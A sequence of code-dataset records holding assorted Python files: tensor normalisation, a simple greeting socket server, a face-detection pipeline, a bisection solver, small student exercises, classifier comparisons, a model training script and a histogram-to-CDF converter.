tensor x'''\n if not polar:\n x = convert_cylindrical_to_polar(x)\n\n ndims = x.ndimension()\n mag, phase = torch.unbind(x, -1)\n x = torch.stack([torch.log(1 + mag), phase], dim=ndims - 1)\n\n if not polar:\n x = convert_polar_to_cylindrical(x)\n\n return x\n\n\ndef exp_mag(x, polar=False):\n '''calculates the exponential of the magnitude in a complex tensor x'''\n if not polar:\n x = convert_cylindrical_to_polar(x)\n\n ndims = x.ndimension()\n mag, phase = torch.unbind(x, -1)\n x = torch.stack([torch.exp(mag) - 1, phase], dim=ndims - 1)\n\n if not polar:\n x = convert_polar_to_cylindrical(x)\n\n return x\n\n\ndef normalize_complex_batch_by_magnitude_only(x, polar=False, normalize_over_channel=False):\n '''\n normalize the complex batch by making the magnitude of mean 1 and std 1, and keep the phase as it is\n :param:\n x: is the input tensor to be normalized\n polar: if x is in the polar form already (i.e. magnitude and phase)\n normalize_over_channel: if the normalization will be performed over all channels\n '''\n\n shift_mean = 5\n if not polar:\n x = convert_cylindrical_to_polar(x)\n\n mag, phase = torch.unbind(x, -1)\n mdims = 1 if normalize_over_channel else 2\n\n sqz_mdims = [-1] * (x.ndims - mdims)\n dim_prod = np.prod(mag.shape[mdims:])\n\n mag_s = mag.reshape((mag.shape[0], dim_prod))\n norm_mag = (mag - unsqueeze_n(mag_s.mean(-1), sqz_mdims)) / unsqueeze_n(mag_s.std(-1), sqz_mdims) + shift_mean\n x = torch.stack([norm_mag, phase], dim=x.ndims - 1)\n\n if not polar:\n x = convert_polar_to_cylindrical(x)\n return x\n\n\nclass ComplexBatchNormalize(nn.Module):\n def __init__(self):\n super(ComplexBatchNormalize, self).__init__()\n\n def forward(self, input):\n return normalize_complex_batch_by_magnitude_only(input)\n","sub_path":"utils/cmplx_batchnorm.py","file_name":"cmplx_batchnorm.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"178975580","text":"import socket\n\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind((socket.gethostname(),1234))\ns.listen(5)\nwhile True:\n clt,adr=s.accept()\n print(f\"connection on {adr}\")\n clt.send(bytes(\"Hello Sockets\",\"utf-8\"))\n clt.close()\n\n \n","sub_path":"python/sockets.py","file_name":"sockets.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"493253011","text":"import torch\n\nfrom pipert.core.message import PredictionPayload\nfrom pipert.utils.structures import Instances, Boxes\nfrom pipert.core.component import BaseComponent\nfrom pipert.core.message import Message\nfrom queue import Queue, Empty, Full\nimport argparse\nfrom urllib.parse import urlparse\nimport zerorpc\nimport gevent\nimport signal\nimport time\nimport cv2\nfrom pipert.core.routine import Routine\nfrom pipert.core.mini_logics import Message2Redis, MessageFromRedis\nfrom pipert.core.routine import Events\nfrom pipert.core.handlers import tick, tock\nfrom pipert.contrib.metrics_collectors.prometheus_collector import PrometheusCollector\nfrom pipert.core.metrics_collector import NullCollector\nfrom pipert.contrib.metrics_collectors.splunk_collector import SplunkCollector\n\n\nclass FaceDetLogic(Routine):\n\n def __init__(self, in_queue, out_queue, out_frame_queue, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.in_queue = in_queue\n self.out_queue = out_queue\n self.out_frame_queue = out_frame_queue\n self.face_cas = None\n\n def main_logic(self, *args, **kwargs):\n try:\n frame_msg = self.in_queue.get(block=False)\n frame = frame_msg.get_payload()\n if frame is not None:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = self.face_cas.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(20, 20)\n )\n if len(faces):\n faces = torch.from_numpy(faces)\n faces[:, 2:] += faces[:, :2]\n # print(faces.size(), faces)\n new_instances = Instances(frame.shape[:2])\n new_instances.set(\"pred_boxes\", Boxes(faces))\n new_instances.set(\"pred_classes\", torch.zeros(faces.size(0)).int())\n else:\n new_instances = Instances(frame.shape[:2])\n new_instances.set(\"pred_classes\", [])\n\n try:\n self.out_queue.get(block=False)\n self.state.dropped += 1\n except Empty:\n pass\n\n pred_msg = Message(new_instances, frame_msg.source_address)\n try:\n self.out_frame_queue.put(frame_msg, block=False)\n self.out_queue.put(pred_msg, block=False)\n except Full:\n return False\n return True\n else:\n time.sleep(0)\n return False\n\n except Empty:\n time.sleep(0)\n return False\n\n def setup(self, *args, **kwargs):\n casc_path = \"pipert/contrib/face_detect/haarcascade_frontalface_default.xml\"\n self.face_cas = cv2.CascadeClassifier(casc_path)\n self.state.dropped = 0\n\n def cleanup(self, *args, **kwargs):\n pass\n\n\nclass FaceDetComponent(BaseComponent):\n\n def __init__(self, endpoint, in_key, out_key, out_frame_key, redis_url, metrics_collector, maxlen=100, name=\"FaceDetection\", use_memory=False):\n super().__init__(endpoint, name, metrics_collector, use_memory=use_memory)\n # TODO: should queue maxsize be configurable?\n self.in_queue = Queue(maxsize=1)\n self.out_queue = Queue(maxsize=1)\n self.out_frame_queue = Queue(maxsize=1)\n\n r_get = MessageFromRedis(in_key, redis_url, self.in_queue, name=\"get_from_redis\", component_name=self.name).as_thread()\n r_sort = FaceDetLogic(self.in_queue, self.out_queue, self.out_frame_queue, name=\"face_det_logic\", component_name=self.name).as_thread()\n r_upload_meta = Message2Redis(out_key, redis_url, self.out_queue, maxlen, name=\"upload_meta\", component_name=self.name).as_thread()\n r_upload_frame = Message2Redis(out_frame_key, redis_url, self.out_frame_queue, maxlen, name=\"upload_frame\", component_name=self.name).as_thread()\n\n routines = [r_get, r_sort, r_upload_meta, r_upload_frame]\n for routine in routines:\n # routine.register_events(Events.BEFORE_LOGIC, Events.AFTER_LOGIC)\n # routine.add_event_handler(Events.BEFORE_LOGIC, tick)\n # routine.add_event_handler(Events.AFTER_LOGIC, tock)\n self.register_routine(routine)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', help='Input stream key name', type=str, default='camera:2')\n parser.add_argument('-o', '--output', help='Output stream key name', type=str, default='camera:3')\n parser.add_argument('-of', '--outputFrame', help='Output Frame stream key name', type=str, default='camera:4')\n parser.add_argument('--monitoring', help='Name of the monitoring service', type=str, default='prometheus')\n parser.add_argument('-s', '--shared', help='Shared memory', type=bool, default=False)\n parser.add_argument('-u', '--url', help='Redis URL', type=str, default='redis://127.0.0.1:6379')\n parser.add_argument('-z', '--zpc', help='zpc port', type=str, default='4248')\n parser.add_argument('--maxlen', help='Maximum length of output stream', type=int, default=100)\n # max_age: int = 1, min_hits: int = None, window_size: int = None, percent_seen\n opt = parser.parse_args()\n\n url = urlparse(opt.url)\n\n if opt.monitoring == 'prometheus':\n collector = PrometheusCollector(8081)\n elif opt.monitoring == 'splunk':\n collector = SplunkCollector()\n else:\n collector = NullCollector()\n\n zpc = FaceDetComponent(f\"tcp://0.0.0.0:{opt.zpc}\", opt.input, opt.output, opt.outputFrame, url, metrics_collector=collector, maxlen=opt.maxlen,\n use_memory=opt.shared)\n print(\"run\")\n zpc.run()\n print(\"Killed\")\n","sub_path":"pipert/contrib/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":5832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"608638791","text":"import numpy as np\n\ndef f(x):\n return 2 * np.cos(x) - x\n\ndef bisection(xm, xp, n_max, e):\n for i in np.arange(n_max):\n x = (xm + xp) / 2\n print(\"i=\", i, \" x=\", x, \" f(x)=\", f(x))\n if f(xp * f(x)) > 0:\n xp = x\n else:\n xm = x\n if xp - xm < e:\n print(\"\\n root found with precision e=\", e)\n break\n if i == n_max - 1:\n print(\"\\n root not found after Nmax iterations \")\n return x\n\ne = 1e-6\na = 0.0\nb = 7.0\nn_max = 100\nroot = bisection(a, b, n_max, e)\nprint(\"Root =\", root)\n","sub_path":"scripts/bisection.py","file_name":"bisection.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"166825929","text":"def verifica_progressao(lista):\n razaoA = [0] * (len(lista) - 1)\n razaoG = [0] * (len(lista) - 1)\n PA = True\n PG = True\n\n for e in range(0,len(lista)):\n if lista[e] != lista[e-1]:\n break\n return \"AG\"\n\n for e in range(1,len(lista)):\n razaoA[e - 1] = lista[e] - lista[e-1]\n for e in range(0, len(razaoA)):\n if razaoA[e] != razaoA[0]:\n PA = False\n\n for e in range(1,len(lista)):\n razaoG[e-1] = lista[e] / lista[e-1]\n for e in range(0, len(razaoG)):\n if razaoG[e] != razaoG[0]:\n PG = False\n\n if PA and PG:\n return 'AG'\n elif PA:\n return 'PA'\n elif PG:\n return 'PG'\n else:\n return 'NA'\n","sub_path":"backup/user_216/ch57_2020_09_28_13_04_50_237738.py","file_name":"ch57_2020_09_28_13_04_50_237738.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"307137097","text":"class Queue:\n def __init__(self):\n self.e_s = []\n def enQ(self,data):\n self.e_s.append(data)\n def dQ(self):\n if len(self.e_s) == 1:\n return self.e_s.pop()\n item = self.e_s.pop()\n dq_item = self.dQ()\n self.e_s.append(item)\n return dq_item\n\nQ = Queue()\n\nQ.enQ(10)\nQ.enQ(5)\nQ.enQ(20)\nprint(Q.dQ())\nQ.enQ(100)\nprint(Q.dQ())\nprint(Q.dQ())\nprint(Q.dQ())","sub_path":"test11.py","file_name":"test11.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"180757462","text":"from DataForClassifier import getShoeFeatures,getShoeLabel,getShoeFeaturesTest,getShoeLabelTest\r\nfrom sklearn import tree\r\nfrom sklearn.ensemble import AdaBoostClassifier,RandomForestClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\nX = getShoeFeatures()\r\nY = getShoeLabel()\r\nX_Test = getShoeFeaturesTest()\r\nY_Test = getShoeLabelTest()\r\n\r\n#Decision Tree Classifier Predictiopn\r\nClf_tree = tree.DecisionTreeClassifier()\r\nClf_tree = Clf_tree.fit(X,Y)\r\npredictionClf_tree = Clf_tree.predict(X_Test)\r\nprint(\"Decision Tree Classifier:\",predictionClf_tree)\r\n\r\n#Ada Boost Classifier Prediction\r\nClf_AdaBoostClassifier = AdaBoostClassifier()\r\nClf_AdaBoostClassifier = Clf_AdaBoostClassifier.fit(X,Y)\r\npredictionClfAdaBoost = Clf_AdaBoostClassifier.predict(X_Test)\r\nprint(\"Ada Boost Classifier:\",predictionClfAdaBoost)\r\n\r\n#Random Forest Classifier Prediction\r\nClf_RandomForest = RandomForestClassifier()\r\nClf_RandomForest = Clf_RandomForest.fit(X,Y)\r\npredictionClfRandomForest = Clf_RandomForest.predict(X_Test)\r\nprint(\"Random Forest Classifier:\",predictionClfRandomForest)\r\n\r\n#Gaussian NB Classifier Prediction\r\nClf_GaussianNB = GaussianNB()\r\nClf_GaussianNB = Clf_GaussianNB.fit(X,Y)\r\npredictionClfGaussianNB = Clf_GaussianNB.predict(X_Test)\r\nprint(\"Gaussian NB Classifier:\",predictionClfGaussianNB)\r\n\r\n\r\n#KNeighbors Classifier Prediction\r\nClf_KNeighbors = KNeighborsClassifier()\r\nClf_KNeighbors = Clf_KNeighbors.fit(X,Y)\r\npredictionClfKNeighbors = Clf_KNeighbors.predict(X_Test)\r\nprint(\"K Neighbors Classifier:\",predictionClfKNeighbors)\r\n\r\n#Calculate accuracies of individual Classifiers\r\nAcc_DTree = accuracy_score(Y_Test,predictionClf_tree)\r\nAcc_AdaBoost = accuracy_score(Y_Test,predictionClfAdaBoost)\r\nAcc_RandomForest = accuracy_score(Y_Test,predictionClfRandomForest)\r\nAcc_GaussianNB = accuracy_score(Y_Test,predictionClfGaussianNB)\r\nAcc_KNeighbors = accuracy_score(Y_Test,predictionClfKNeighbors)\r\n\r\nprint(\"Decision Tree Accuracy: \", Acc_DTree)\r\nprint(\"Ada Boost Accuracy: \", Acc_AdaBoost)\r\nprint(\"Random Forest Accuracy: \", Acc_RandomForest)\r\nprint(\"GaussianNB Accuracy: \", Acc_GaussianNB)\r\nprint(\"KNeighbors Accuracy: \", Acc_KNeighbors)\r\n\r\n#Print the Maximum accuracy\r\nprint(\"Max Accuracy:\",max(Acc_DTree,Acc_KNeighbors,Acc_GaussianNB,Acc_RandomForest,Acc_AdaBoost))\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"PredictMFAccuracy.py","file_name":"PredictMFAccuracy.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"217545480","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\n\nimport argparse\nimport os\nimport pprint\nimport shutil\nimport importlib\nimport time\nimport torch\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nfrom tensorboardX import SummaryWriter\n\nfrom torch.utils.data import DataLoader, ConcatDataset\nfrom datetime import datetime\n\nfrom config.common import _C as cfg\nfrom config.common import update_config\nfrom core.loss import HybridLoss\nfrom core.function import train\nfrom core.function import validate\nfrom utils.utils import get_optimizer\nfrom utils.utils import save_checkpoint\nfrom utils.utils import create_logger\n\nimport dataset\nimport models\n\n\ndef timer(start_time=None):\n if not start_time:\n return datetime.now()\n elif start_time:\n thour, temp_sec = divmod((datetime.now() - start_time).total_seconds(), 3600)\n tmin, tsec = divmod(temp_sec, 60)\n print('Time taken: %i hours %i minutes and %s seconds.\\n' % (thour, tmin, round(tsec, 2)))\n return datetime.now()\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train keypoints network')\n # general\n parser.add_argument('--cfg',\n help='experiment configure file name',\n required=True,\n type=str)\n\n parser.add_argument('opts',\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER)\n\n # philly\n parser.add_argument('--modelDir',\n help='model directory',\n type=str,\n default='')\n parser.add_argument('--logDir',\n help='log directory',\n type=str,\n default='')\n parser.add_argument('--dataDir',\n help='data directory',\n type=str,\n default='')\n parser.add_argument('--prevModelDir',\n help='prev Model directory',\n type=str,\n default='')\n\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n args = parse_args()\n update_config(cfg, args)\n\n logger, final_output_dir, tb_log_dir = create_logger(\n cfg, args.cfg, 'train')\n\n logger.info(pprint.pformat(args))\n logger.info(cfg)\n\n # cudnn related setting\n cudnn.benchmark = cfg.CUDNN.BENCHMARK\n torch.backends.cudnn.deterministic = cfg.CUDNN.DETERMINISTIC\n torch.backends.cudnn.enabled = cfg.CUDNN.ENABLED\n\n model_builder = importlib.import_module(\"models.\" + cfg.MODEL.NAME).get_fovea_net\n model = model_builder(cfg, is_train=True)\n\n # xiaofeng add for load parameter\n if cfg.TEST.MODEL_FILE:\n logger.info('=> loading model from {}'.format(cfg.TEST.MODEL_FILE))\n model.load_state_dict(torch.load(cfg.TEST.MODEL_FILE), strict=False)\n\n # copy model file -- xiaofeng comment it\n # this_dir = os.path.dirname(__file__)\n # shutil.copy2(os.path.join(this_dir, '../models', cfg.MODEL.NAME + '.py'), final_output_dir)\n\n writer_dict = {\n 'writer': SummaryWriter(log_dir=tb_log_dir),\n 'train_global_steps': 0,\n 'valid_global_steps': 0,\n }\n\n dump_input = torch.rand(\n (1, 3, cfg.MODEL.IMAGE_SIZE[1], cfg.MODEL.IMAGE_SIZE[0])\n )\n\n model = torch.nn.DataParallel(model, device_ids=cfg.GPUS).cuda()\n\n # define loss function (criterion) and optimizer\n criterion = HybridLoss(\n roi_weight=cfg.LOSS.ROI_WEIGHT,\n regress_weight=cfg.LOSS.REGRESS_WEIGHT,\n use_target_weight=cfg.LOSS.USE_TARGET_WEIGHT,\n hrnet_only=cfg.TRAIN.HRNET_ONLY).cuda()\n\n # Data loading code\n # normalize = transforms.Normalize(\n # mean=[0.134, 0.207, 0.330], std=[0.127, 0.160, 0.239]\n # )\n # train_dataset = importlib.import_module('dataset.'+cfg.DATASET.DATASET).Dataset(\n # cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET, True,\n # transforms.Compose([\n # transforms.ToTensor(),\n # normalize,\n # ])\n # )\n # valid_dataset = importlib.import_module('dataset.'+cfg.DATASET.DATASET).Dataset(\n # cfg, cfg.DATASET.ROOT, cfg.DATASET.TEST_SET, False,\n # transforms.Compose([\n # transforms.ToTensor(),\n # normalize,\n # ])\n # )\n # \n # train_loader = torch.utils.data.DataLoader(\n # train_dataset,\n # batch_size=cfg.TRAIN.BATCH_SIZE_PER_GPU*len(cfg.GPUS),\n # shuffle=cfg.TRAIN.SHUFFLE,\n # num_workers=cfg.WORKERS,\n # pin_memory=cfg.PIN_MEMORY\n # )\n # valid_loader = torch.utils.data.DataLoader(\n # valid_dataset,\n # batch_size=cfg.TEST.BATCH_SIZE_PER_GPU*len(cfg.GPUS),\n # shuffle=False,\n # num_workers=cfg.WORKERS,\n # pin_memory=cfg.PIN_MEMORY\n # )\n\n db_trains = []\n db_vals = []\n final_full_test = cfg.TRAIN.FULL_DATA\n normalize_1 = transforms.Normalize(\n mean=[0.282, 0.168, 0.084], std=[0.189, 0.110, 0.062]\n )\n train_dataset_1 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_1, True,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_1,\n ])\n )\n db_trains.append(train_dataset_1)\n\n normalize_2 = transforms.Normalize(\n mean = [0.409, 0.270, 0.215], std = [0.288, 0.203, 0.160]\n )\n train_dataset_2 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_2, True,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_2,\n ])\n )\n db_trains.append(train_dataset_2)\n\n if final_full_test is True:\n normalize_3 = transforms.Normalize(\n mean = [0.404, 0.271, 0.222], std = [0.284, 0.202, 0.163]\n )\n train_dataset_3 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TEST_SET, True,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_3,\n ])\n )\n db_trains.append(train_dataset_3)\n\n train_dataset = ConcatDataset(db_trains)\n logger.info(\"Combined Dataset: Total {} images\".format(len(train_dataset)))\n\n train_batch_size = cfg.TRAIN.BATCH_SIZE_PER_GPU * len(cfg.GPUS)\n train_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=train_batch_size,\n shuffle=cfg.TRAIN.SHUFFLE,\n num_workers=cfg.WORKERS,\n pin_memory=cfg.PIN_MEMORY\n )\n\n normalize = transforms.Normalize(\n mean=[0.404, 0.271, 0.222], std=[0.284, 0.202, 0.163]\n )\n val_dataset_1 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TEST_SET, False,\n transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n )\n db_vals.append(val_dataset_1)\n\n if final_full_test is True:\n normalize_1 = transforms.Normalize(\n mean=[0.282, 0.168, 0.084], std=[0.189, 0.110, 0.062]\n )\n val_dataset_2 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_1, False,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_1,\n ])\n )\n db_vals.append(val_dataset_2)\n\n normalize_2 = transforms.Normalize(\n mean=[0.409, 0.270, 0.215], std=[0.288, 0.203, 0.160]\n )\n val_dataset_3 = importlib.import_module('dataset.' + cfg.DATASET.DATASET).Dataset(\n cfg, cfg.DATASET.ROOT, cfg.DATASET.TRAIN_SET_2, False,\n transforms.Compose([\n transforms.ToTensor(),\n normalize_2,\n ])\n )\n db_vals.append(val_dataset_3)\n\n valid_dataset = ConcatDataset(db_vals)\n\n logger.info(\"Val Dataset: Total {} images\".format(len(valid_dataset)))\n\n test_batch_size = cfg.TEST.BATCH_SIZE_PER_GPU * len(cfg.GPUS)\n valid_loader = torch.utils.data.DataLoader(\n valid_dataset,\n batch_size=cfg.TEST.BATCH_SIZE_PER_GPU * len(cfg.GPUS),\n shuffle=False,\n num_workers=cfg.WORKERS,\n pin_memory=cfg.PIN_MEMORY\n )\n\n logger.info(\"Train len: {}, batch_size: {}; Test len: {}, batch_size: {}\" \\\n .format(len(train_loader), train_batch_size, len(valid_loader), test_batch_size))\n\n best_metric = 1e6\n best_model = False\n last_epoch = -1\n optimizer = get_optimizer(cfg, model)\n begin_epoch = cfg.TRAIN.BEGIN_EPOCH\n\n if cfg.TEST.MODEL_FILE:\n checkpoint_file = cfg.TEST.MODEL_FILE\n else:\n checkpoint_file = os.path.join(final_output_dir, 'checkpoint.pth')\n\n if cfg.AUTO_RESUME and os.path.exists(checkpoint_file):\n logger.info(\"=> loading checkpoint '{}'\".format(checkpoint_file))\n checkpoint = torch.load(checkpoint_file)\n # begin_epoch = checkpoint['epoch']\n begin_epoch = 0 # xiaofeng change it\n best_metric = checkpoint['metric']\n last_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n\n optimizer.load_state_dict(checkpoint['optimizer'])\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(\n checkpoint_file, checkpoint['epoch']))\n\n if cfg.TRAIN.LR_EXP:\n # llr=lr∗gamma∗∗epoch\n lr_scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer, cfg.TRAIN.GAMMA1, last_epoch=-1)\n else:\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(\n optimizer, cfg.TRAIN.LR_STEP, cfg.TRAIN.LR_FACTOR,\n last_epoch=last_epoch\n )\n\n for epoch in range(begin_epoch, cfg.TRAIN.END_EPOCH):\n start_time = timer()\n\n lr_scheduler.step()\n\n # evaluate on validation set\n # lr_metric, hr_metric, final_metric = validate(\n # cfg, valid_loader, valid_dataset, model, criterion,\n # final_output_dir, tb_log_dir, writer_dict, db_vals\n # )\n # print(\"validation before training spent time:\")\n # timer(start_time) # timing ends here for \"start_time\" variable\n\n # train for one epoch\n train(cfg, train_loader, model, criterion, optimizer, epoch,\n final_output_dir, tb_log_dir, writer_dict)\n\n print(\"epoch %d train spent time:\" % (epoch))\n train_time = timer(start_time) # timing ends here for \"start_time\" variable\n\n # if epoch >= int(cfg.TRAIN.END_EPOCH/10):\n # evaluate on validation set\n lr_metric, hr_metric, final_metric = validate(\n cfg, valid_loader, valid_dataset, model, criterion,\n final_output_dir, tb_log_dir, writer_dict, db_vals\n )\n\n print(\"validation spent time:\")\n val_time = timer(train_time) # timing ends here for \"start_time\" variable\n\n min_metric = min(lr_metric, hr_metric, final_metric)\n if min_metric <= best_metric:\n best_metric = min_metric\n best_model = True\n logger.info('=> epoch [{}] best model result: {}'.format(epoch, best_metric))\n else:\n best_model = False\n\n # xiaofeng changed it\n if best_model is True:\n logger.info('=> saving checkpoint to {}'.format(final_output_dir))\n # transfer the model to CPU before saving to fix unstable bug:\n # github.com/pytorch/pytorch/issues/10577\n\n model = model.cpu()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'model': cfg.MODEL.NAME,\n 'state_dict': model.state_dict(),\n 'best_state_dict': model.module.state_dict(),\n 'metric': final_metric,\n 'optimizer': optimizer.state_dict(),\n }, best_model, final_output_dir)\n model = model.cuda()\n\n print(\"saving spent time:\")\n end_time = timer(val_time) # timing ends here for \"start_time\" variable\n elif (epoch % 60 == 0) and (epoch != 0):\n logger.info('=> saving epoch {} checkpoint to {}'.format(epoch, final_output_dir))\n # transfer the model to CPU before saving to fix unstable bug:\n # github.com/pytorch/pytorch/issues/10577\n\n time_str = time.strftime('%Y-%m-%d-%H-%M')\n if cfg.TRAIN.HRNET_ONLY:\n checkpoint_filename = 'checkpoint_HRNET_epoch%d_%s.pth' % (epoch, time_str)\n else:\n checkpoint_filename = 'checkpoint_Hybrid_epoch%d_%s.pth' % (epoch, time_str)\n model = model.cpu()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'model': cfg.MODEL.NAME,\n 'state_dict': model.state_dict(),\n 'best_state_dict': model.module.state_dict(),\n 'metric': final_metric,\n 'optimizer': optimizer.state_dict(),\n }, best_model, final_output_dir, checkpoint_filename)\n model = model.cuda()\n\n # xiaofeng change\n time_str = time.strftime('%Y-%m-%d-%H-%M')\n if cfg.TRAIN.HRNET_ONLY:\n model_name = 'final_state_HRNET_%s.pth' % (time_str)\n else:\n model_name = 'final_state_Hybrid_%s.pth' % (time_str)\n\n final_model_state_file = os.path.join(final_output_dir, model_name)\n logger.info('=> saving final model state to {}'.format(final_model_state_file))\n torch.save(model.module.state_dict(), final_model_state_file)\n writer_dict['writer'].close()\n\n # save a final checkpoint\n model = model.cpu()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'model': cfg.MODEL.NAME,\n 'state_dict': model.state_dict(),\n 'best_state_dict': model.module.state_dict(),\n 'metric': final_metric,\n 'optimizer': optimizer.state_dict(),\n }, best_model, final_output_dir, \"checkpoint_final_state.pth\")\n # model = model.cuda()\n\n\nif __name__ == '__main__':\n main()\n print(\"Refuge Fovea Train Program Exit ... \\n\")","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"460858738","text":"#!/usr/bin/python3\n\nfrom pathlib import Path\n\nimport argparse\nimport csv\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"histogram\", help='input histogram folder')\nargs = parser.parse_args()\n\nhistogram = Path(args.histogram)\nplot_folder = Path('.')\n\nhistograms = list(histogram.glob('**/*.pcap.hist-filtered.csv'))\nfor hist in histograms:\n\n filname = hist.stem.replace('.hist-filtered', '.hist-filtered.cdf')\n #print(filname)\n\n with open(hist, newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(spamreader)\n total = 0\n for row in spamreader:\n total += int(row[1])\n\n with open(hist, newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(spamreader)\n with open(plot_folder.joinpath(filname + '.csv'), 'w', newline='') as csvfile:\n \n spamwriter = csv.writer(csvfile, delimiter=';', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n integrator = 0\n for row in spamreader:\n integrator += int(row[1])\n if (1 - (float(integrator)/total)) > 0.0:\n magic = 1 / (1 - float(integrator)/total)\n spamwriter.writerow([str(row[0]), str(magic), str(integrator), str('{:.20f}'.format(float(integrator)/total))])\n else:\n # maximum measured value not plottable on log scale\n\t\t # => shift it to the non-printed area of the graph\n magic = 1 / (1 - (float(integrator) - 0.000001)/total)\n spamwriter.writerow([str(row[0]), str(magic), str(integrator), str('{:.20f}'.format(float(integrator)/total))])\n","sub_path":"scripts/hdrplot.py","file_name":"hdrplot.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"168506959","text":"\"\"\"Crie um programa que leia a idade e o sexo de várias pessoas.A cada pessoa\r\ncadastrada, o programa deverá perguntar se o usuário quer ou não continuar.\r\nNo final, mostre:\r\nA) quantas pessoas tem mais de 18 anos.\r\nB) quantos homens foram cadastrados.\r\nC) Quantas mulheres tem menos de 20 anos\"\"\"\r\n\r\ntot18 = homem = totm20 = 0\r\nwhile True:\r\n print('=' * 20)\r\n print('CADASTRO DE PESSOA')\r\n print('=' * 20)\r\n idade = int(input('Idade: ').strip())\r\n sexo = ' '\r\n while sexo not in 'MF':\r\n sexo = str(input('Sexo [M/F]: ').strip()).upper()[0]\r\n\r\n if idade > 18:\r\n tot18 += 1\r\n if sexo == 'M':\r\n homem += 1\r\n if sexo == 'F' and idade < 20:\r\n totm20 += 1\r\n\r\n continua = ' '\r\n while continua not in 'SN':\r\n continua = str(input('Quer continuar [S/N]? ').strip()).upper()[0]\r\n if continua == 'N':\r\n break\r\nprint('FIM DO PROGRAMA')\r\nprint(f'Total de PESSOAS com mais de 18 anos: {tot18}')\r\nprint(f'Total de HOMENS cadastrados: {homem}')\r\nprint(f'Total de MULHERES com menos de 20 anos: {totm20}')","sub_path":"ex069.py","file_name":"ex069.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135373016","text":"\n\nimport argparse\n#import pickle\n#import scipy\n#from scipy.stats import norm\nimport numpy\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import matplotlib.mlab as mlab\n#==========load txt file\n\nx = []\nrms = []\nRMSE = []\ny = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nR_input=[0.8300, 0.8300, 0.8300, 0.8628, 0.8682, 0.8965, 0.8500, 0.8868, 0.8792]\nj = 1\nM = 10\nwhile j< M:\n l = str(j)\n #data1 = numpy.loadtxt('../fit_PRad/fit_result/CF4_Model_' + l +'_1e4.txt', float)#load the fitted radius\n #data1 = numpy.loadtxt('../fit/loop_9models_roofit/roofit_result_PRad_range/R12_Model' + l +'_1e4.txt', float)#load the fitted radius\n data1 = numpy.loadtxt('../fit/loop_9models/fit_result/R12_Cut01GeV_Model' + l 